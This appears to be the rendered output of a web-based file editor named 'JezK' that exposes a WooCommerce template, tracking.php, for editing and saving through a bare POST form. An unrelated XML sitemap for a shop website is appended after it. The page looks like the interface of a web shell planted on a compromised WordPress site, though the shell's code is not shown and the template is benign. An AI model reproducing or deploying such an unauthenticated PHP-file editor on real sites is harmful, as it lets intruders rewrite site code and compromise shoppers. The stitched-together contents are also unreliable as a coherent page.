
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>JezK</title>
<style>
    body {
        font-family: Arial, sans-serif;
        margin: 0;
        padding: 0;
    }
    #container {
        max-width: 800px;
        margin: 20px auto;
        padding: 20px;
        border: 1px solid #ccc;
        border-radius: 5px;
        background-color: #f9f9f9;
    }
    h1 {
        text-align: center;
        color: #333;
    }
    h2 {
        margin-top: 30px;
        color: #555;
    }
    ul {
        list-style-type: none;
        padding: 0;
    }
    li {
        margin-bottom: 10px;
    }
    a {
        text-decoration: none;
        color: #007bff;
    }
    a:hover {
        text-decoration: underline;
    }
    form {
        margin-top: 20px;
    }
    input[type="text"], input[type="file"], input[type="submit"] {
        margin-bottom: 10px;
    }
    hr {
        border: 0;
        height: 1px;
        background-color: #ccc;
        margin-top: 20px;
        margin-bottom: 20px;
    }
</style>
</head>
<body>
<div id="container">
    <h1>JezK</h1>
    <h2>Edit File: tracking.php</h2><form method="post"><textarea name="file_content" rows="10" cols="50">&lt;?php
/**
 * Order tracking
 *
 * This template can be overridden by copying it to yourtheme/woocommerce/order/tracking.php.
 *
 * HOWEVER, on occasion WooCommerce will need to update template files and you
 * (the theme developer) will need to copy the new files to your theme to
 * maintain compatibility. We try to do this as little as possible, but it does
 * happen. When this occurs the version of the template file will be bumped and
 * the readme will list any important changes.
 *
 * @see https://woocommerce.com/document/template-structure/
 * @package WooCommerce\Templates
 * @version 10.6.0
 */

defined( &#039;ABSPATH&#039; ) || exit;

$notes = $order-&gt;get_customer_order_notes();
?&gt;

&lt;p class=&quot;order-info&quot;&gt;
	&lt;?php
	echo wp_kses_post(
		/**
		 * Filter to modify order tracking status text.
		 *
		 * @param string $order_status The order status text.
		 *
		 * @since 10.1.0
		 */
		apply_filters(
			&#039;woocommerce_order_tracking_status&#039;,
			sprintf(
				/* translators: 1: order number 2: order date 3: order status */
				__( &#039;Order #%1$s was placed on %2$s and is currently %3$s.&#039;, &#039;woocommerce&#039; ),
				&#039;&lt;mark class=&quot;order-number&quot;&gt;&#039; . $order-&gt;get_order_number() . &#039;&lt;/mark&gt;&#039;,
				&#039;&lt;mark class=&quot;order-date&quot;&gt;&#039; . wc_format_datetime( $order-&gt;get_date_created() ) . &#039;&lt;/mark&gt;&#039;,
				&#039;&lt;mark class=&quot;order-status&quot;&gt;&#039; . wc_get_order_status_name( $order-&gt;get_status() ) . &#039;&lt;/mark&gt;&#039;
			),
			$order
		)
	);
	?&gt;
&lt;/p&gt;

&lt;?php if ( $notes ) : ?&gt;
	&lt;h2&gt;&lt;?php esc_html_e( &#039;Order updates&#039;, &#039;woocommerce&#039; ); ?&gt;&lt;/h2&gt;
	&lt;ol class=&quot;commentlist notes&quot;&gt;
		&lt;?php foreach ( $notes as $note ) : ?&gt;
		&lt;li class=&quot;comment note&quot;&gt;
			&lt;div class=&quot;comment_container&quot;&gt;
				&lt;div class=&quot;comment-text&quot;&gt;
					&lt;p class=&quot;meta&quot;&gt;&lt;?php echo date_i18n( esc_html__( &#039;l jS \o\f F Y, h:ia&#039;, &#039;woocommerce&#039; ), strtotime( $note-&gt;comment_date ) ); // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped ?&gt;&lt;/p&gt;
					&lt;div class=&quot;description&quot;&gt;
						&lt;?php echo wp_kses_post( wpautop( wptexturize( $note-&gt;comment_content ) ) ); ?&gt;
					&lt;/div&gt;
					&lt;div class=&quot;clear&quot;&gt;&lt;/div&gt;
				&lt;/div&gt;
				&lt;div class=&quot;clear&quot;&gt;&lt;/div&gt;
			&lt;/div&gt;
		&lt;/li&gt;
		&lt;?php endforeach; ?&gt;
	&lt;/ol&gt;
&lt;?php endif; ?&gt;

&lt;?php do_action( &#039;woocommerce_view_order&#039;, $order-&gt;get_id() ); ?&gt;
</textarea><br><input type="submit" value="Save"></form></div>
</body>
</html>

<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="https://tiffingrab.ca/wp-sitemap-index.xsl" ?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><sitemap><loc>https://tiffingrab.ca/wp-sitemap-posts-post-1.xml</loc></sitemap><sitemap><loc>https://tiffingrab.ca/wp-sitemap-posts-page-1.xml</loc></sitemap><sitemap><loc>https://tiffingrab.ca/wp-sitemap-posts-product-1.xml</loc></sitemap><sitemap><loc>https://tiffingrab.ca/wp-sitemap-taxonomies-category-1.xml</loc></sitemap><sitemap><loc>https://tiffingrab.ca/wp-sitemap-taxonomies-product_cat-1.xml</loc></sitemap><sitemap><loc>https://tiffingrab.ca/wp-sitemap-taxonomies-product_tag-1.xml</loc></sitemap><sitemap><loc>https://tiffingrab.ca/wp-sitemap-users-1.xml</loc></sitemap></sitemapindex>
